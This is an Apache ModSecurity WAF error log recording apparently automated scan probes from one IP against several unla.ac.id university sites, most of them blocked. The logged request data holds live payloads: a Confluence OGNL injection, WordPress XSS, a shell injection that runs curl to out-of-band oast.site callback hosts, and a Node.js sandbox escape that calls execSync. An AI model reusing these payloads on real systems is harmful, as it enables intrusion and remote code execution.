[Tue Aug 29 11:31:49.317713 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQMrwIAAAAu"]
[Tue Aug 29 11:31:49.380385 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAPiBlkAAAAB"]
[Tue Aug 29 11:31:49.402904 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQQymoAAAAy"]
[Tue Aug 29 11:31:49.406754 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAP8G1sAAAAV"]
[Tue Aug 29 11:31:49.412081 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tcCo-f0AAAP5mLIAAAAM"]
[Tue Aug 29 11:31:50.308928 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP5mLMAAAAM"]
[Tue Aug 29 11:31:50.309565 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP6NP4AAAAQ"]
[Tue Aug 29 11:31:50.318085 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAPiBloAAAAB"]
[Tue Aug 29 11:31:50.319018 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQnF4sAAAAF"]
[Tue Aug 29 11:31:50.319682 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAQR474AAAAz"]
[Tue Aug 29 11:31:50.320471 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQV4P0AAAA3"]
[Tue Aug 29 11:31:50.393154 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP8G14AAAAV"]
[Tue Aug 29 11:31:50.573744 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAPDn9kAAAAP"]
[Tue Aug 29 11:31:50.573744 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP@M3kAAAAZ"]
[Tue Aug 29 11:31:50.579281 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgi3k6agyt7qj4b.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgfgq6kaowrhqgz.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10tsCo-f0AAAQMrwoAAAAu"]
[Tue Aug 29 11:31:51.301219 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgdehdexop5w4hx.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgkqxwqxmi66fy4.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAP6NQcAAAAQ"]
[Tue Aug 29 11:31:51.305600 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgqg4mjtkq3w8hn.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg6wgt7hkzwubgg.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAP5mLUAAAAM"]
[Tue Aug 29 11:31:51.307353 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQMrwsAAAAu"]
[Tue Aug 29 11:31:51.307928 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAPDn9sAAAAP"]
[Tue Aug 29 11:31:51.308539 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQV4QYAAAA3"]
[Tue Aug 29 11:31:51.311637 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQkBYsAAAAC"]
[Tue Aug 29 11:31:51.317612 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQR48MAAAAz"]
[Tue Aug 29 11:31:51.347612 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQQym0AAAAy"]
[Tue Aug 29 11:31:51.372561 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAQR48UAAAAz"]
[Tue Aug 29 11:31:51.387040 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQQym8AAAAy"]
[Tue Aug 29 11:31:51.393338 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP6NQsAAAAQ"]
[Tue Aug 29 11:31:51.415599 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAP6NQwAAAAQ"]
[Tue Aug 29 11:31:51.423657 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAP@M4AAAAAZ"]
[Tue Aug 29 11:31:51.474612 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP@M4IAAAAZ"]
[Tue Aug 29 11:31:51.477217 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10t8Co-f0AAAPiBl0AAAAB"]
[Tue Aug 29 11:31:51.494554 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAQR48oAAAAz"]
[Tue Aug 29 11:31:52.299204 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10uMCo-f0AAAPiBl4AAAAB"]
